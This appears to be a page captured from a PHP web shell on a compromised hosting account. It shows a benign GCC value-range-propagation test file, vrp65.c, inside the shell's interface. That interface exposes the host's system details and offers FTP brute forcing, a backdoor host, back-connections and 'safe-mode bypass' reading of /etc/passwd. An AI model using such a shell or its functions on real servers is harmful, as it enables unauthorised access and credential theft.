Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/tree-ssa/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     vrp65.c (5.17 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* PR tree-optimization/52267 */
/* { dg-do link } */
/* { dg-options "-O2" } */

extern void link_error (void);

#define BITSM1 (sizeof (int) * __CHAR_BIT__ - 1)
#define BITSH ((sizeof (int) - sizeof (short)) * __CHAR_BIT__)

void
f1 (unsigned int s)
{
  if ((s & (7U << (BITSM1 - 2))) != 0)
    {
      if (s <= (1U << (BITSM1 - 2)) - 1)
    link_error ();
    }
  else
    {
      if (s >= (1U << (BITSM1 - 2)))
    link_error ();
    }
}

void
f2 (int s)
{
  if ((s & (7U << (BITSM1 - 2))) == 0)
    {
      if (s >= (1 << (BITSM1 - 2)) || s < 0)
    link_error ();
    }
  else
    {
      if (s >= 0 && s <= (1 << (BITSM1 - 2)) - 1)
    link_error ();
    }
}

void
f3 (unsigned int s)
{
  if ((s & 0x3cc0) == 0)
    {
      if (s >= -15552U)
    link_error ();
    }
  else
    {
      if (s <= 0x3f)
    link_error ();
    }
}

void
f4 (int s)
{
  if ((s & 0x3cc0) == 0)
    {
      if (s >= -15552 && s < 0)
    link_error ();
    }
  else
    {
      if (/* s <= 0x3fU */ s == 0 || s == 0x20 || s == 0x3f)
    link_error ();
    }
}

void
f5 (int s)
{
  if ((s & 0x3cc0U) == 0)
    {
      if (s >= -15552 && s < 0)
    link_error ();
    }
  else
    {
      if (/* s <= 0x3fU */ s == 0 || s == 0x20 || s == 0x3f)
    link_error ();
    }
}

void
f6 (unsigned int s)
{
  if ((s & 0x3cc0) == 0x3cc0)
    {
      if (s <= 0x3cbf)
    link_error ();
    }
  else
    {
      if (s >= -64U)
    link_error ();
    }
}

void
f7 (int s)
{
  if ((s & 0x3cc0) == 0x3cc0)
    {
      if (s >= 0 && s <= 0x3cbf)
    link_error ();
    }
  else
    {
      if (s >= -64 && s < 0)
    link_error ();
    }
}

void
f8 (int s)
{
  if ((s & 0x3cc0U) == 0x3cc0)
    {
      if (s >= 0 && s <= 0x3cbf)
    link_error ();
    }
  else
    {
      if (s >= -64 && s < 0)
    link_error ();
    }
}

void
f9 (unsigned int s)
{
  if ((s & 0x3cc0) >= 0x1cc0)
    {
      if (s <= 0x1cbf)
    link_error ();
    }
  else
    {
      if (s >= -8256U)
    link_error ();
    }
}

void
f10 (unsigned int s)
{
  if ((s & 0x3cc0) > 0x1cc0)
    {
      if (s <= 0x1fff)
    link_error ();
    }
  else
    {
      if (s >= -8192U)
    link_error ();
    }
}

void
f11 (int s)
{
  if ((s & 0x3cc0) >= 0x1cc0)
    {
      if (s >= 0 && s <= 0x1cbf)
    link_error ();
    }
  else
    {
      if (s >= -8256 && s < 0)
    link_error ();
    }
}

void
f12 (int s)
{
  if ((s & 0x3cc0) > 0x1cc0)
    {
      if (s >= 0 && s <= 0x1fff)
    link_error ();
    }
  else
    {
      if (s >= -8192 && s < 0)
    link_error ();
    }
}

void
f13 (unsigned int s)
{
  if ((s & (0xe071U << BITSH)) > (0xb030U << BITSH))
    {
      if (s <= ((0xc000U << BITSH) - 1))
    link_error ();
    }
  else
    {
      if (s >= (0xc000U << BITSH))
    link_error ();
    }
}

void
f14 (unsigned int s)
{
  if ((s & (0xe071U << BITSH)) > (0xa030U << BITSH))
    {
      if (s <= ((0xa031U << BITSH) - 1))
    link_error ();
    }
  else
    {
      if (s >= (0xbfbfU << BITSH))
    link_error ();
    }
}

void
f15 (int s)
{
  if ((s & ((-0x1f8f) << BITSH)) > ((-0x4fd0) << BITSH))
    {
      if (s <= ((-0x4000 << BITSH) - 1))
    link_error ();
    }
  else
    {
      if (s > ((-0x4000 << BITSH) - 1))
    link_error ();
    }
}

void
f16 (int s)
{
  if ((s & ((-0x1f8f) << BITSH)) >= ((-0x4fd0) << BITSH))
    {
      if (s <= ((-0x4000 << BITSH) - 1))
    link_error ();
    }
  else
    {
      if (s > ((-0x4000 << BITSH) - 1))
    link_error ();
    }
}

void
f17 (int s)
{
  if ((s & ((-0x4000 << BITSH) | 1)) != -__INT_MAX__ - 1)
    {
      if (s == -__INT_MAX__ - 1)
    link_error ();
    }
  else
    {
      if (s >= (-0x4000 << BITSH) - 1)
    link_error ();
    }
}

void
f18 (int s)
{
  if ((s & ((-0x4000 << BITSH) | 1)) != ((-0x4000 << BITSH) | 1))
    {
      if (s == -1)
    link_error ();
    }
  else
    {
      if (s < ((-0x4000 << BITSH) | 1) || s >= 0)
    link_error ();
    }
}

void
f19 (int s)
{
  if ((s & ((-0x4000 << BITSH) | 1)) != ((0x4000 << BITSH) | 1))
    {
      if (s == __INT_MAX__)
    link_error ();
    }
  else
    {
      if (s <= (0x4000 << BITSH))
    link_error ();
    }
}

void
f20 (int s)
{
  if ((s & (-0x1000 << BITSH)) != -__INT_MAX__ - 1)
    {
      if (s < (-0x7000 << BITSH))
    link_error ();
    }
  else
    {
      if (s >= (-0x7000 << BITSH))
    link_error ();
    }
}

void
f21 (int s)
{
  if ((s & (-0x1000 << BITSH)) != (-0x1000 << BITSH))
    {
      if (s >= (-0x1000 << BITSH) && s < 0)
    link_error ();
    }
  else
    {
      if (s < (-0x1000 << BITSH) || s >= 0)
    link_error ();
    }
}

void
f22 (int s)
{
  if ((s & (-0x1000 << BITSH)) != (0x7000 << BITSH))
    {
      if (s >= (0x7000 << BITSH))
    link_error ();
    }
  else
    {
      if (s < (0x7000 << BITSH))
    link_error ();
    }
}

void
f23 (unsigned int s)
{
  if ((s & (0xf000U << BITSH)) != (0x7000 << BITSH))
    {
      if (/* s >= (0x7000 << BITSH) && s < (0x8000U << BITSH) */
      s == (0x7000 << BITSH) || s == __INT_MAX__)
    link_error ();
    }
  else
    {
      if (s < (0x7000 << BITSH) || s >= (0x8000U << BITSH))
    link_error ();
    }
}

void
f24 (unsigned int s)
{
  if ((s & (0xf000U << BITSH)) != (0x8000U << BITSH))
    {
      if (/* s >= (0x8000U << BITSH) && s < (0x9000U << BITSH) */
      s == (0x8000U << BITSH) || s == (0x9000U << BITSH) - 1)
    link_error ();
    }
  else
    {
      if (s >= (0x9000U << BITSH) || s < (0x8000U << BITSH))
    link_error ();
    }
}

int
main ()
{
  return 0;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0058 ]--